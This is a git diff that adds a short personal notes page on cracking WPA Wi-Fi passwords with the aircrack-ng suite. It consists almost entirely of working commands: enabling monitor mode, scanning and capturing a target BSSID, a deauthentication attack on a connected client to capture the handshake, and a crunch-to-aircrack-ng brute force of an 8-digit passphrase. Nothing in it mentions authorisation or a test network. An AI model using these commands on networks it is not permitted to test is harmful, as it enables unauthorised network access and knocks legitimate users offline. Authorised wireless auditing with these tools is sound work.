diff --git a/HowtoCrackWPA.page b/HowtoCrackWPA.page
new file mode 100644
index 0000000..57d9763
--- /dev/null
+++ b/HowtoCrackWPA.page
@@ -0,0 +1,39 @@
+# Monitor mode
+For my RTL8188EUS:
+
+```
+ip link set wlanX down
+iw dev wlanX set type monitor
+```
+
+# Scan networks
+
+All channels:
+```
+airodump-ng wlanX
+```
+Specific channel:
+```
+airodump-ng -c 6 wlanX
+```
+
+# Save a capture of chosen BSSID
+
+```
+airodump-ng -c 6 --bssid 00:23:B1:82:08:xx -w <filename> wlanX
+```
+
+You need to wait for a client to connect, or to deauth it and get the 4-way handshake.
+```
+aireplay-ng -0 1 -a 00:23:B1:82:0C:xx -c D0:37:45:2F:52:xx wlanX
+```
+`-a` is access point  
+`-c` is client  
+
+Then you should have an EAPOL/WPA handshake.
+
+# Crack WPA passphrase
+
+## For a 8 digits scheme
+
+crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx <filename>.cap